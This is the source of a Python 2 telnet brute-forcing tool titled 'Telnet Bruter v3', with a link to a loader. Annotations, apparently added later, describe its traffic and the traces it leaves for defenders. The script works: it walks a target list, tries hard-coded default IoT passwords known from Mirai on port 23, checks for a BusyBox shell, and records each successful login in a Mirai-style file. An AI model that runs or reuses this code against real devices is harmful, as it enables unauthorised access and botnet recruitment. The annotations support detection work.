1 | #!/usr/bin/python | |
2 | # Telnet Bruter v3 *FINAL* | By; LiGhT | |
3 | # Loader: https://pastebin.com/thqXywvQ | |
4 | ||
5 | ||
6 | import threading | |
7 | import sys, os, re, time, socket | |
8 | from Queue import * | |
9 | from sys import stdout | |
10 | ||
# Command-line contract: <list> is a file of target addresses (one per line,
# see readlines() below), <threads> is the number of dispatcher threads and
# <output file> receives one line per successful login.
11 | if len(sys.argv) < 4: | |
12 | print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>" | |
13 | sys.exit() | |
14 | ||
# The whole target list is read into memory before any connection is made.
15 | ips = open(sys.argv[1], "r").readlines() | |
16 | threads = int(sys.argv[2]) | |
17 | output_file = sys.argv[3] | |
18 | queue = Queue() | |
19 | queue_count = 0 | |
20 | ||
# Hard-coded "username:password" pairs, tried in list order against every
# target. For defenders this list is the indicator set: these exact strings
# are what a telnet honeypot or a device's auth log records, and a device is
# only reachable by this script if TCP/23 is open and one of the pairs is
# accepted.
# NOTE(review): the last entry renders as "root: " (one space after the
# colon); whether the original paste had an empty password there cannot be
# told from this rendering.
21 | combo = [ #use as many passwords as ya want(P.S. The more passwords the slower the bruteforce is going to be) | |
22 | "support:support", | |
23 | "admin:admin", | |
24 | "user:user", | |
25 | "root:antslq", | |
26 | "supervisor:zyad1234", | |
27 | "root:xc3511", | |
28 | "root:vizxv", | |
29 | "root: " | |
30 | ] | |
31 | ||
# Every line of the list goes onto the queue unmodified (the trailing newline
# is stripped later, in router.__init__); the counter is progress output only.
32 | for ip in ips: | |
33 | queue_count += 1 | |
34 | stdout.write("\r[%d] Added to queue" % queue_count) | |
35 | stdout.flush() | |
36 | queue.put(ip) | |
37 | print "\n" | |
38 | ||
# One thread per target: walks the credential list against the target's
# telnet port (TCP/23) and records a pair once a BusyBox shell answers.
# NOTE(review): indentation was lost in this rendering, so the nesting of the
# try/except blocks below cannot be recovered with certainty; the comments
# describe statement order only.
39 | class router(threading.Thread): | |
40 | def __init__ (self, ip): | |
41 | threading.Thread.__init__(self) | |
# Drop the newline left over from readlines().
42 | self.ip = str(ip).rstrip('\n') | |
43 | def run(self): | |
44 | username = "" | |
45 | password = "" | |
# Each entry is split on ":"; an "n/a" half stands for "send an empty string",
# although no entry in the visible combo list uses that marker.
46 | for passwd in combo: | |
47 | if ":n/a" in passwd: | |
48 | password="" | |
49 | else: | |
50 | password=passwd.split(":")[1] | |
51 | if "n/a:" in passwd: | |
52 | username="" | |
53 | else: | |
54 | username=passwd.split(":")[0] | |
# A fresh TCP connection to port 23 per credential pair, with an 8-second
# socket timeout. The break after the handler appears to abandon the target
# on a connect failure rather than try the remaining pairs.
55 | try: | |
56 | tn = socket.socket() | |
57 | tn.settimeout(8) | |
58 | tn.connect((self.ip,23)) | |
59 | except Exception: | |
60 | tn.close() | |
61 | break | |
# Prompt matching uses the substrings "ogin:" and "assword:", so either
# capitalisation of the first letter matches. The username follows the login
# prompt directly, then a 0.09 s pause.
62 | try: | |
63 | hoho = '' | |
64 | hoho += readUntil(tn, "ogin:") | |
65 | if "ogin" in hoho: | |
66 | tn.send(username + "\n") | |
67 | time.sleep(0.09) | |
68 | except Exception: | |
69 | tn.close() | |
# Password is sent after the password prompt, then a 0.8 s pause before the
# reply is read.
70 | try: | |
71 | hoho = '' | |
72 | hoho += readUntil(tn, "assword:") | |
73 | if "assword" in hoho: | |
74 | tn.send(password + "\n") | |
75 | time.sleep(0.8) | |
76 | else: | |
77 | pass | |
78 | except Exception: | |
79 | tn.close() | |
# Post-login classification on up to 40960 bytes of reply: a ">" prompt that
# does not contain "ONT" takes the first branch, a "#", "$", "%" or "@" prompt
# takes the second, anything else closes the socket.
80 | try: | |
81 | prompt = '' | |
82 | prompt += tn.recv(40960) | |
83 | if ">" in prompt and "ONT" not in prompt: | |
84 | try: | |
# Detection note: the literal lines "cat | sh", "sh" and "busybox" arrive
# within roughly 0.1 s of each other right after authentication; that fixed,
# machine-paced sequence is what an IDS or honeypot session log would show.
85 | tn.send("cat | sh" + "\n") | |
86 | time.sleep(0.1) | |
87 | success = False | |
88 | timeout = 8 | |
89 | data = ["BusyBox", "Built-in"] | |
90 | tn.send("sh" + "\n") | |
91 | time.sleep(0.01) | |
92 | tn.send("busybox" + "\r\n") | |
# A login counts as a hit only if the reply collected over up to 8 seconds
# contains "BusyBox" or "Built-in" and does not contain "unrecognized".
93 | buf = '' # NO FALSE POSSITIVES OVA HERE | |
94 | start_time = time.time() | |
95 | while time.time() - start_time < timeout: | |
96 | buf += tn.recv(40960) | |
97 | time.sleep(0.01) | |
98 | for info in data: | |
99 | if info in buf and "unrecognized" not in buf: | |
100 | success = True | |
101 | break | |
102 | except: | |
103 | pass | |
104 | elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt: | |
105 | try: | |
106 | success = False | |
107 | timeout = 8 | |
108 | data = ["BusyBox", "Built-in"] | |
# Same probe for shell-style prompts: "sh", "shell", "help" and "busybox" are
# sent 0.01 s apart, and the reply is tested with the same markers as above.
109 | tn.send("sh" + "\n") | |
110 | time.sleep(0.01) | |
111 | tn.send("shell" + "\n") | |
112 | time.sleep(0.01) | |
113 | tn.send("help" + "\n") | |
114 | time.sleep(0.01) | |
115 | tn.send("busybox" + "\r\n") | |
116 | buf = '' # NO FALSE POSSITIVES OVA HERE | |
117 | start_time = time.time() | |
118 | while time.time() - start_time < timeout: | |
119 | buf += tn.recv(40960) | |
120 | time.sleep(0.01) | |
121 | for info in data: | |
122 | if info in buf and "unrecognized" not in buf: | |
123 | success = True | |
124 | break | |
125 | except: | |
126 | pass | |
127 | else: | |
128 | tn.close() | |
# On a hit, one line "<ip>:23 <user>:<pass>" is appended to the output file by
# shelling out to echo (the command string is built by plain concatenation).
# The author's trailing comment labels this format "mirai"; the two
# commented-out lines are alternative output formats. A file of lines in this
# shape on a host is a forensic artifact of the script having run there.
129 | if success == True: | |
130 | try: | |
131 | #os.system("echo "+self.ip+" >> "+output_file+"") #1.1.1.1 # bios.txt | |
132 | #os.system("echo "+self.ip+":"+username+":"+password+" >> "+output_file+"") # 1.1.1.1:user:pass # regular | |
133 | os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai | |
# ANSI-coloured console line with the username, password and address.
134 | print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip) | |
135 | tn.close() | |
136 | break | |
137 | except: | |
138 | tn.close() | |
139 | tn.close() | |
140 | except Exception: | |
141 | tn.close() | |
142 | ||
# Accumulate data from the socket `tn` in chunks of up to 1024 bytes until
# `string` appears in the buffer, then return everything read so far.
# Raises a plain Exception('TIMEOUT!') once `timeout` seconds (default 8) have
# passed without a match. The elapsed-time check runs only between recv()
# calls; each individual recv() is bounded by whatever timeout the caller set
# on the socket.
143 | def readUntil(tn, string, timeout=8): | |
144 | buf = '' | |
145 | start_time = time.time() | |
146 | while time.time() - start_time < timeout: | |
147 | buf += tn.recv(1024) | |
148 | time.sleep(0.01) | |
149 | if string in buf: return buf | |
150 | raise Exception('TIMEOUT!') | |
151 | ||
# Dispatcher loop: takes one target at a time off the shared queue and starts
# a router thread for it, pausing 0.2 s between starts. The router thread is
# started but never joined here, so the <threads> argument sets the number of
# dispatchers, not a cap on concurrent connections. Seen from the network,
# each dispatcher opens sessions to a new address roughly every 0.2 s.
# All exceptions are swallowed by the bare except clauses.
152 | def worker(): | |
153 | try: | |
154 | while True: | |
155 | try: | |
156 | IP = queue.get() | |
157 | thread = router(IP) | |
158 | thread.start() | |
159 | queue.task_done() | |
160 | time.sleep(0.2) | |
161 | except: | |
162 | pass | |
163 | except: | |
164 | pass | |
165 | ||
# Start <threads> dispatcher threads running worker(), 0.01 s apart; a failure
# to start a thread is silently ignored.
166 | for l in xrange(threads): | |
167 | try: | |
168 | t = threading.Thread(target=worker) | |
169 | t.start() | |
170 | time.sleep(0.01) | |
171 | except: | |
172 | pass |